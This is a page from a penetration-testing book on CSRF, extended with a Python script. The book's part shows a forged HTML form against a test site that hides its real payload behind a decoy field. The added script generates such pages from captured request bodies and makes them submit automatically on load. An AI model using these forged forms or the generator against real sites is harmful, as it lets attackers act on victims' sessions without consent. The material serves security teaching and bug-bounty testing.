Page 124 - Hands-On Bug Hunting for Penetration Testers
CSRF and Insecure Session Authentication Chapter 6
Strictly speaking, this CSRF PoC does what we need it to: it shows that a page we control can
forge a form submission to the target. But to make it just a tiny bit more black
hat (and show the bounty program a hint of how the vulnerability could be exploited), let's
add some hidden-field chicanery.
Here's what our snippet looks like once it turns the visible form field into a dummy field
and adds a second, hidden field that carries the actual payload:
    <html>
    <form action="http://webscantest.com/csrf/csrfpost.php"
          enctype="application/x-www-form-urlencoded" method="POST">
        <label>color</label>
        <input name="dummy-property" type="text" value="">
        <input name="property" type="hidden" value="Peasoup">
        <input type="submit" value="http://webscantest.com/csrf/csrfpost.php">
    </form>
    </html>
You can see in the malicious part, the hidden field that populates the property the web app will
actually consume, that we're submitting Peasoup as the user's favorite color. The visible field
is only a decoy. The depths of our depravity know no bounds.
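As an added example, not code from the book, here is a small Python generator that turns a captured form body into a PoC page of the kind shown above: every parameter the application consumes rides in a hidden field, one harmless-looking text field is left visible as a decoy, and a one-line script submits the form as soon as the page loads so the victim never has to click. The target URL and the Peasoup value are the ones used on this page; the decoy field name dummy-property, the Submit button text and the sample body are assumptions. Keep in mind that a PoC like this only proves anything if the target accepts the request without a per-session anti-CSRF token and the browser attaches the session cookie to a cross-site POST, which it will not do for a cookie marked SameSite=Lax or SameSite=Strict.

```python
import html
from urllib.parse import parse_qsl, urlsplit

# Constructed sample request: the target and parameter from the page's PoC.
# Neither value comes from a live capture.
SAMPLE_ACTION = "http://webscantest.com/csrf/csrfpost.php"
SAMPLE_BODY = "property=Peasoup"


def form_fields_from_body(body):
    """Turn a captured application/x-www-form-urlencoded body into a dict.

    keep_blank_values matters: a server-side 'field must be present' check
    is satisfied by an empty hidden input, so blanks must not be dropped.
    """
    return dict(parse_qsl(body, keep_blank_values=True))


def hidden_inputs(fields):
    """One hidden <input> per real parameter. Attribute values are
    HTML-escaped so a payload containing quotes or angle brackets
    cannot break out of the form markup."""
    return [
        '<input name="%s" type="hidden" value="%s">'
        % (html.escape(name, quote=True), html.escape(value, quote=True))
        for name, value in fields.items()
    ]


def build_csrf_poc(action, fields, method="POST", decoy_label="color",
                   decoy_name="dummy-property", auto_submit=True):
    """Assemble the PoC page.

    The decoy text field is what the victim sees; everything the
    application actually consumes travels in hidden fields. With
    auto_submit the form posts on load, so no click is required.
    Only http(s) actions are accepted, so a pasted 'javascript:' URL
    or a typo cannot yield a page that does anything other than a
    cross-site form submission.
    """
    scheme = urlsplit(action).scheme.lower()
    if scheme not in ("http", "https"):
        raise ValueError("action must be an http(s) URL, got %r" % action)
    if method.upper() not in ("GET", "POST"):
        raise ValueError("HTML forms only submit GET or POST")

    lines = [
        "<html>",
        "<body>",
        '<form action="%s" enctype="application/x-www-form-urlencoded" '
        'method="%s">' % (html.escape(action, quote=True), method.upper()),
        "<label>%s</label>" % html.escape(decoy_label),
        '<input name="%s" type="text" value="">'
        % html.escape(decoy_name, quote=True),
    ]
    lines.extend(hidden_inputs(fields))
    lines.append('<input type="submit" value="Submit">')
    lines.append("</form>")
    if auto_submit:
        # Submit the first (only) form on the page without user interaction.
        lines.append("<script>document.forms[0].submit();</script>")
    lines.append("</body>")
    lines.append("</html>")
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    print(build_csrf_poc(SAMPLE_ACTION, form_fields_from_body(SAMPLE_BODY)))
```

Save the printed page as an .html file on a host you control and open it in a browser that holds a live session with the target; if the colour changes, the endpoint is consuming a cross-site POST with no token check.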
Pretending to be a hapless user, when we open our snippet in the browser, we don't see any
red flags (on the surface). If we opened our dev tools and started inspecting the hidden
field element, it would be a different story: